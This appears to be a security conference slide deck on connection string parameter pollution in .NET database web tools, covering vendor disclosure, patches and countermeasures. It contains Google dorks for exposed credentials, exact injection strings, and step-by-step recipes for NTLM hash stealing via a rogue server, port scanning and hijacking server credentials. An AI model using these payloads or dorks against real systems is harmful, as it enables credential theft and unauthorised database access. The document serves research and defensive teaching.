Connection Strings 



• Define the way an application connects to a data repository 

• There are connection strings for: 

— Relational Databases (MSSQL, Oracle, MySQL,...) 

— LDAP Directories 

— Files 

— Etc... 
Database Connection Strings 

Data Source = myServerAddress; 
Initial Catalog = myDataBase; 
User Id = myUsername; 
Password = myPassword; 

Informática 64 

www.informatica64.com 



Google Hacking 

[Screenshot: Google search for intitle:"Login" Datasource inurl:login.aspx. Several of the indexed login pages expose complete connection strings in their visible text, including Data Source, Initial Catalog, User ID and Password values, or Integrated Security=SSPI settings] 
Google Hacking 

[Screenshot: further results for the same search, including login.asp pages whose source contains an OLE DB connection string constant with Provider, Password, User ID and Data Source values, and a page showing an internal DATA SOURCE name] 
UDL (Universal Data Links) Files 

[Screenshot: Google search for filetype:UDL password, listing .udl files indexed from public web servers. Each file starts with "[oledb] ; Everything after this line is an OLE DB initstring" and carries a full connection string: Provider=SQLOLEDB.1 (or MSDASQL.1), Password, Persist Security Info=True, User ID, Initial Catalog and Data Source] 

[Screenshot: the Windows Data Link Properties dialog (Propiedades de vínculo de datos) opened on one of those .udl files. The Connection tab is pre-filled with the server name, a specific user name and saved password ("Allow saving password" checked) and the database to select, ready for "Test connection"] 



Credentials 

Operating System Accounts 

Data Source = myServerAddress; 
Initial Catalog = myDataBase; 
User Id = myUsername; 
Password = myPassword; 
Integrated Security = SSPI/True/Yes; 

Database Credentials 

Data Source = myServerAddress; 
Initial Catalog = myDataBase; 
User Id = myUsername; 
Password = myPassword; 
Integrated Security = No; 
Users Authenticated by Web App 

The web application manages the login process: 

1.- The web application connects to the database using its own credentials. 

2.- It asks the user for login information. 

3.- It checks that login information against the data stored in a custom users table. 

[Diagram: App running on Web Server <-> Database Engine] 

Users Authenticated by Database 

The database engine manages the login process. 

[Diagram: App running on Web Server <-> Database Engine] 
Connection String Attacks 

• It's possible to inject parameters into connection 
strings using semicolons as separators 

Data Source = myServerAddress; 
Initial Catalog = myDataBase; 
Integrated Security = NO; 
User Id = myUsername; 
Password = myPassword; Encryption = Off; 
ConnectionStringBuilder 

• Available in .NET Framework 2.0 

• Build secure connection strings using parameters 

• It's not possible to inject into the connection string 

The following example demonstrates how the SqlConnectionStringBuilder handles an inserted extra value for the Initial Catalog setting. 

Visual Basic 

    Dim builder As New System.Data.SqlClient.SqlConnectionStringBuilder 
    builder("Data Source") = "(local)" 
    builder("Integrated Security") = True 
    ' The value carries an extra "key=value" pair after a semicolon; 
    ' the builder emits it as a quoted value, not as a new keyword. 
    builder("Initial Catalog") = "AdventureWorks;NewValue=Bad" 
    Console.WriteLine(builder.ConnectionString) 

C# 

    System.Data.SqlClient.SqlConnectionStringBuilder builder = 
        new System.Data.SqlClient.SqlConnectionStringBuilder(); 
    builder["Data Source"] = "(local)"; 
    builder["Integrated Security"] = true; 
    // Same extra "key=value" pair: it stays part of the Initial Catalog value. 
    builder["Initial Catalog"] = "AdventureWorks;NewValue=Bad"; 
    Console.WriteLine(builder.ConnectionString); 
Are people aware of this? 

[Screenshot: Google search for "Connection String Attack" inurl:OWASP - the search did not match any documents] 

[Screenshot: Google search for "Connection String Injection" inurl:OWASP - the search did not match any documents] 



Connection String Parameter Pollution 

• The goal is to inject parameters into the connection 
string, whether they already exist in it or not 

• If a parameter is duplicated, the last value wins 

• This behavior allows an attacker to completely 
rewrite the connection string, and therefore to 
manipulate how the application will work and 
how it authenticates 
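The "last value wins" rule, the semicolon injection from the Connection String Attacks slide and the builder-based fix from the ConnectionStringBuilder slide, shown together in working code. This is an added example, not code from the original slides, and it is written in Python rather than the .NET shown on the page so that the parsing rule is explicit. parse() resolves a connection string the way the SqlClient grammar documented for SqlConnectionStringBuilder does (semicolon-separated key=value pairs, case-insensitive keys, values optionally wrapped in double or single quotes with the quote doubled inside, a repeated key keeping its last value); build_unsafe() is the string-concatenation pattern from the attack slides; build_safe() reproduces what a builder does, quoting any value that contains ';', '=' or a quote character; duplicate_keys() is a defensive check that flags a string carrying the same keyword twice. The sample values (SQL2005, db1, Rogue_Server) are the ones from the slides; all function names are this example's own.

```python
"""Connection string parameter pollution (CSPP) in miniature.

Added example, not from the original slides. The tokenizer follows the
SqlClient connection-string grammar as documented for
SqlConnectionStringBuilder: 'key=value' pairs separated by ';', keys are
case-insensitive, a value may be wrapped in double or single quotes with the
quote character doubled inside, and when a key is repeated the LAST value wins.
build_unsafe() is the concatenation pattern from the slides; build_safe() and
duplicate_keys() are this example's own helpers.
"""
from collections import Counter
from typing import Iterator, Tuple

TEMPLATE = (("Data Source", "SQL2005"),      # constructed sample values, as on the slides
            ("Initial Catalog", "db1"),
            ("Integrated Security", "no"))


def tokens(cs: str) -> Iterator[Tuple[str, str]]:
    """Yield (key, value) pairs in the order they appear in the string."""
    i, n = 0, len(cs)
    while i < n:
        while i < n and cs[i] in " ;":      # skip separators and empty entries
            i += 1
        if i >= n:
            break
        eq = cs.find("=", i)
        if eq == -1:
            raise ValueError("keyword without a value at offset %d" % i)
        key = cs[i:eq].strip().lower()
        i = eq + 1
        while i < n and cs[i] == " ":
            i += 1
        if i < n and cs[i] in "\"'":          # quoted value
            q, i, buf = cs[i], i + 1, []
            while True:
                if i >= n:
                    raise ValueError("unterminated quoted value")
                if cs[i] == q:
                    if i + 1 < n and cs[i + 1] == q:   # doubled quote is a literal quote
                        buf.append(q)
                        i += 2
                        continue
                    i += 1
                    break
                buf.append(cs[i])
                i += 1
            value = "".join(buf)
            while i < n and cs[i] == " ":
                i += 1
            if i < n and cs[i] != ";":
                raise ValueError("unexpected text after quoted value")
        else:                                 # bare value runs to the next ';'
            end = cs.find(";", i)
            end = n if end == -1 else end
            value = cs[i:end].strip()
            i = end
        yield key, value


def parse(cs: str) -> dict:
    """Effective settings of a connection string: a repeated key keeps its last value."""
    settings = {}
    for key, value in tokens(cs):
        settings[key] = value
    return settings


def duplicate_keys(cs: str) -> list:
    """Defensive check: keywords that occur more than once are a pollution indicator."""
    counts = Counter(key for key, _ in tokens(cs))
    return sorted(k for k, c in counts.items() if c > 1)


def build_unsafe(user: str, password: str) -> str:
    """The vulnerable pattern from the slides: raw input concatenated into the string."""
    head = ";".join(f"{k}={v}" for k, v in TEMPLATE)
    return f"{head};User ID={user};Password={password};"


def quote(value: str) -> str:
    """Quote a value the way a builder does, so a ';' inside it cannot start a new keyword."""
    if any(c in value for c in ";=\"'") or value != value.strip():
        return '"' + value.replace('"', '""') + '"'
    return value


def build_safe(user: str, password: str) -> str:
    """Builder-style construction: every value is quoted whenever it needs to be."""
    pairs = list(TEMPLATE) + [("User ID", user), ("Password", password)]
    return ";".join(f"{k}={quote(v)}" for k, v in pairs) + ";"


if __name__ == "__main__":
    # Constructed input reproducing the polluted string on the CSPP slides:
    # both fields carry extra key=value pairs after a leading ';'.
    user = ";Data Source=Rogue_Server;"
    password = ";Integrated Security=True;"
    for build in (build_unsafe, build_safe):
        cs = build(user, password)
        eff = parse(cs)
        print(build.__name__, "->", eff["data source"], eff["integrated security"],
              "duplicates:", duplicate_keys(cs))
```

Running the block prints the effective Data Source and Integrated Security for both builders: the concatenated string resolves to Rogue_Server / True and two duplicated keywords are reported, while the quoted string keeps SQL2005 / no and the injected text stays inside the User ID value. The same duplicate_keys() check can be run over connection strings the application logs before opening them.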
Pollutionable Behavior 

[Diagram: a DBConnection object built from a list of parameters (Param.)] 
What can be done with CSPP? 

Rewrite a parameter 
Scanning the DMZ 

[Diagram: a web app vulnerable to CSPP, reachable from the Internet, whose Data Source can be pointed at the other hosts in the DMZ: Development Database, Financial, Test Database, Forgotten Database, Production Database] 

Port Scanning a Server 
What can be done with CSPP? 

Add a parameter 
CSPP Attack 1: Hash stealing 

1.- Run a rogue server on an accessible IP address: 
    Rogue_Server 

2.- Activate a sniffer to catch the login process: 
    Cain/Wireshark 

3.- Duplicate the Data Source parameter: 
    Data_Source=Rogue_Server 

4.- Force Windows Integrated Authentication: 
    Integrated Security=true 
CSPP Attack 1: Hash stealing 

Connection string built by the application: 

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+; 

Polluted connection string: 

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Rogue_Server; Password=;Integrated Security=True; 
CSPP 1: ASP.NET Enterprise Manager 

[Screenshot: ASP.NET Enterprise Manager "Connect to Server" form (Server Address: localhost) with the Username and Password fields polluted with "; data source = <rogue server IP>" and "; integrated security = true"] 

[Screenshot: Cain sniffer, Query tab, dated 22/07/2009 13:53:09, listing the captured logins with columns Timestamp, TDS server, Client, Username, Password, AuthType, Domain, LM Hash and NTLM Hash; two "NTLM Session Security" entries for domain GRUPO_TRABAJO were recorded when the web server authenticated against the rogue server] 
CSPP Attack 2: Port Scanning 

1.- Duplicate the Data Source parameter, setting in 
it the target server and the target port to be 
scanned: 

    Data_Source=Target_Server,Target_Port 

2.- Check the error messages: 

    - No TCP Connection -> Port is closed 

    - No SQL Server -> Port is open 

    - SQL Server -> Invalid Password 
CSPP Attack 2: Port Scanning 

Connection string built by the application: 

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+; 

Polluted connection string: 

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server,Target_Port; Password=;Integrated Security=True; 



CSPP 2: myLittleAdmin 

Port is Opened 

[Screenshot: myLittleAdmin for SQL Server 3.5 login form (localhost, master, SQL Server Authentication) with "; data source = www.google.com, 80" injected into the credential field] 

myLittleAdmin Error Dialog Box - .Net SqlClient Data Provider: 
A connection was successfully established with the server, but then an error occurred during the login process. (provider: TCP Provider, error: 0 - An existing connection was forcibly closed by the remote host.) 

Port is Closed 

[Screenshot: the same login form with "; data source = www.google.com, <closed port>" injected] 

myLittleAdmin Error Dialog Box - .Net SqlClient Data Provider: 
A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: TCP Provider, error: 0 - A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.) 
CSPP Attack 3: Hijacking Web Credentials 

1.- Duplicate the Data Source parameter, pointing it 
to the target SQL Server: 

    Data_Source=Target_Server 

2.- Force Windows Authentication: 
    Integrated Security=true 

3.- The application pool in which the web app is 
running will send its own credentials in order to 
log in to the database engine. 
CSPP Attack 3: Hijacking Web Credentials 

Connection string built by the application: 

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+; 

Polluted connection string: 

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server; Password=;Integrated Security=true; 
CSPP Attack 3: Web Data Administrator 

[Screenshot: Web Data Administrator connected to the server. The Databases list shows master, msdb, ReportServer, ReportServerTempDB and tempdb; the Logins list (Name, Type, Server Access) shows NT AUTHORITY\NETWORK SERVICE (NTUser, Grant), sa (Standard, NonNTLogin) and BUILTIN\Users (NTGroup, Grant)] 
CSPP Attack 3: myLittleAdmin/myLittleBackup 

[Screenshot: myLittleAdmin "Connection" information page after the pollution] 

Connection string: Data Source=<redacted>; Network Library=; Connection Timeout=30; Packet Size=4096; Integrated Security=no; User ID=; data source=localhost; integrated security=true; Encrypt=no; Initial Catalog=master; 

Connection timeout: 30 
Database: master 
Data source: localhost 
Network packet size: 4096 
Server version: 09.00.3054 
Workstation: MSSQLWEB 

The effective values shown (Data source: localhost, integrated security on) are the ones from the duplicated parameters at the end of the string. 
CSPP Attack 3: ASP.NET Enterprise Manager 

[Screenshot: "Connect to Server" form (Server Address: localhost) with "test; data source = localhost; integrated security=true" injected into the credential fields] 

[Screenshot: ASP.NET Enterprise Manager tree after connecting: Databases (master, msdb, tempdb), Security (Logins, Server Roles), Management (Process Info)] 



Other Databases 

• MySQL 

— Does not support Integrated Security 

— It's still possible to manipulate the behavior of the web application, 
although only for: 

• Port Scanning 

• Connecting to internal/testing/development databases 

• Oracle supports integrated authentication running on Windows 
and UNIX/Linux servers 

— It's possible to perform all the described attacks: 

• Hash stealing 

• Port Scanning 

• Hijacking Web credentials 

— It's also possible to elevate a connection to sysdba in order to 
shut down/start up an instance 
myLittleAdmin/myLittleBackup 

[Screenshot: myLittleTools support forum thread "Security update for myLittleAdmin and myLittleBackup", posted by a myLittleTools administrator on Thursday, 3 September 2009, 10:47:57] 

myLittleTools announces a security update for myLittleAdmin and myLittleBackup 

Paris, France - September 3, 2009 -- A security update has been issued for myLittleAdmin and myLittleBackup that fixes one security vulnerability. All users should install this update as soon as possible. 

Users can download this update by selecting Help/Check for Update in the applications' sidebar. 

http://www.myLittleBackup.com 

myLittleTools released a security advisory and a patch about this 
ASP.NET Enterprise Manager 

ASP.NET Enterprise Manager is "abandoned", but it's 
been used in a lot of web Control Panels. 

ASPEnterpriseManager.vb (original, vulnerable version; excerpt): 

    '******************** CONNECTION STRING 
    Public Class connectionstring 

        Private _Datasource As String 
        Private _InitialCatalog As String 
        Private _UID As String 
        Private _PWD As String 
        Private _constr As String 

        Public Property Datasource As String 
            Get 
                Return (_Datasource) 
            End Get 
            Set 
                _Datasource = value 
                ' Raw concatenation: a ';' inside any of these values starts a new keyword 
                _constr = "Data source=" & _Datasource & ";initial catalog=" & _InitialCatalog & ";uid=" & _UID & ";pwd=" & _PWD 
            End Set 
        End Property 

• Fix the code yourself 
ASP.NET Enterprise Manager 

ASP.NET Enterprise Manager is "abandoned", but it's 
been used in a lot of web Control Panels. 

ASPEntManager.txt (patched version; excerpt): 

    ' Requires "Imports System.Data.SqlClient" at the top of the file 

    Public Property Datasource As String 
        Get 
            Return (_Datasource) 
        End Get 
        Set 
            _Datasource = value 
            BuildConnectionString() 
        End Set 
    End Property 

    Private Sub BuildConnectionString() 
        ' Each value is added as a parameter; the builder quotes it if it contains ';' 
        Dim builder As New SqlConnectionStringBuilder 
        builder.Add("Data source", _Datasource) 
        builder.Add("initial catalog", _InitialCatalog) 
        builder.Add("uid", _UID) 
        builder.Add("pwd", _PWD) 
        _constr = builder.ConnectionString 
    End Sub 

• Fix the code yourself 
ASP.NET Web Data Administrator 

[Screenshot: SQL Web Data Administrator home page on CodePlex (http://www.codeplex.com/SqlWebAdmin) in Internet Explorer] 

RE: Connection String Injection Attacks [9366jh] 

Microsoft Security Response Center 

Hi Chema, 

thank you very much for your thoughtful input on this matter. As you 
may already have noticed, the corresponding entry on download center 
is no longer available now as a result of your report. We will archive 
the issue on our end. Please let me know if you have any further 
questions or comments. 

Thanks 

ASP.NET Web Data Administrator is secure on the CodePlex web site, but not on 
the Microsoft web site, where an insecure old version had been published. 
Countermeasures 

• Harden your firewall 

- Outbound connections 

• Harden your internal accounts 

- Web application 

- Web server 

- Database Engine 

• Use ConnectionStringBuilder 

• Filter the ; 
Questions? 

Contact 

Chema Alonso 

chema@informatica64.com 

http://www.informatica64.com 

http://elladodelmal.blogspot.com 

Palako 

palakko@lateatral.com 